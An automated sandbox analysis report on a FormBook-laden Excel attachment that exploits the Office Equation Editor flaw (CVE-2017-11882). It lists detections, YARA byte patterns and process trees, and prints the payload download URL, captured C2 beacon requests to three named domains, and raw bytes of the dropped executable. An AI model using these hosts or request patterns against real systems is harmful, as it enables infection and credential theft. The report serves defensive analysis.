Play interactive tour

Edit tour

Analysis Report EME_PO.47563.xlsx

Overview

General Information

Sample Name:	EME_PO.47563.xlsx
Analysis ID:	323358
MD5:	3ef301afc6cc945e31ab9c8f4c24b29c
SHA1:	fc4f87402b120027927a5303eb3ced1e96f979a4
SHA256:	f6feb4b1cb9e6c6df4cab250ed38f0b25d6033ce97a7e68dbf90eb6c49fb1b13
Tags:	FormbookVelvetSweatshopxlsx
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM_3

Yara detected FormBook

.NET source code contains potential unpacker

Contains functionality to log keystrokes (.Net Source)

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2196 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2348 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2436 cmdline: 'C:\Users\Public\vbc.exe' MD5: 4A105D55BFF1F7304E01CE7198BADA6B)

vbc.exe (PID: 2768 cmdline: {path} MD5: 4A105D55BFF1F7304E01CE7198BADA6B)

explorer.exe (PID: 1388 cmdline: MD5: 38AE1B3C38FAEF56FE4907922F0385BA)

explorer.exe (PID: 2792 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 6DDCA324434FFA506CF7DC4E51DB7935)

cmd.exe (PID: 2804 cmdline: /c del 'C:\Users\Public\vbc.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x10ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x10e42:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x1cb55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x1c641:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x1cc57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1cdcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x1185a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1b8bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x125d2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x21c47:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x22cea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x1eb79:$sqlite3step: 68 34 1C 7B E1 0x1ec8c:$sqlite3step: 68 34 1C 7B E1 0x1eba8:$sqlite3text: 68 38 2A 90 C5 0x1eccd:$sqlite3text: 68 38 2A 90 C5 0x1ebbb:$sqlite3blob: 68 53 D8 7F 8C 0x1ece3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7a98:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7e22:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x883a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1289c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x95b2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18c27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19cca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x15b59:$sqlite3step: 68 34 1C 7B E1 0x15c6c:$sqlite3step: 68 34 1C 7B E1 0x15b88:$sqlite3text: 68 38 2A 90 C5 0x15cad:$sqlite3text: 68 38 2A 90 C5 0x15b9b:$sqlite3blob: 68 53 D8 7F 8C 0x15cc3:$sqlite3blob: 68 53 D8 7F 8C
00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.2133084587.0000000002638000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 2436	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.vbc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
5.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
5.2.vbc.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.vbc.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2348, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2436

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 192.227.129.22, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2348, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2348, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://192.227.129.22/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 25%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 25%

Multi AV Scanner detection for submitted file

Show sources

Source: EME_PO.47563.xlsx

ReversingLabs: Detection: 37%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000007.00000002.2346887922.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2169851044.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2133207139.0000000003421000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2169870384.00000000002E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2346860528.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2133240259.000000000349B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2346737399.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2169888431.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

Source: 5.2.vbc.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 00214E5Dh	4_2_00214DE8
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop esi	5_2_00415820
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then pop ebx	5_2_00406A9F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop esi	7_2_00095820
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 4x nop then pop ebx	7_2_00086A9F

Source: global traffic

DNS query: name: www.hostingbisniz.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.227.129.22:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 192.227.129.22:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.74:80 -> 192.168.2.22:49169

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Nov 2020 03:15:59 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.34Last-Modified: Thu, 26 Nov 2020 22:38:57 GMTETag: "7dc00-5b50a35a0744f"Accept-Ranges: bytesContent-Length: 515072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 1c ca bf 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 07 00 00 0a 00 00 00 00 00 00 d6 ee 07 00 00 20 00 00 00 00 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 84 ee 07 00 4f 00 00 00 00 00 08 00 14 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c cf 07 00 00 20 00 00 00 d0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 14 06 00 00 00 00 08 00 00 08 00 00 00 d2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 da 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 ee 07 00 00 00 00 00 48 00 00 00 02 00 05 00 48 9a 00 00 94 85 00 00 03 00 00 00 8c 00 00 06 dc 1f 01 00 a8 ce 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 09 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 09 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 16 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 01 00 00 11 02 7b 0a 00 00 04 0a 06 0b 07 03 28 18 00 00 0a 74 11 00 00 01 0c 02 7c 0a 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 9a 02 73 19 00 00 0a 7d 07 00 00 04 02 7e 1a 00 00 0a 7d 08 00 00 04 02 28 1b 00 00 0a 00 00 02 28 07 00 00 06 00 2a 1b 30 01 00 14 00 00 00 00 00 00 00 00 00 02 28 08 00 00 06 00 de 08 02 28 0f 00 00 0a 00 dc 2a 01 10 00 0

Source: global traffic	HTTP traffic detected: GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=OW9WwwQcQ8ztOX5YgXZ2qNcRwznn7rmsJyX42Vrsm3RiMqRsS0WcEJSAu/B+R53MEk5Vww== HTTP/1.1Host: www.hostingbisniz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mz59/?u2M0SF6h=6o65y5aQ3K5IIOIZSpB7cm3zMzY8A11b3Xh1T1GzD81isrOpTqP8VmdELK0Vgou9N3EQzw==&rFN0=Xrx4qn HTTP/1.1Host: www.8no3.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mz59/?rFN0=Xrx4qn&u2M0SF6h=2h5hbT8wvHGvzmy0HBHdrVji2gh81Syn3N+I4+PuKAlq7cZqA7t6XPE7i2q+Hmh3HpIQwA== HTTP/1.1Host: www.cna-notary.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
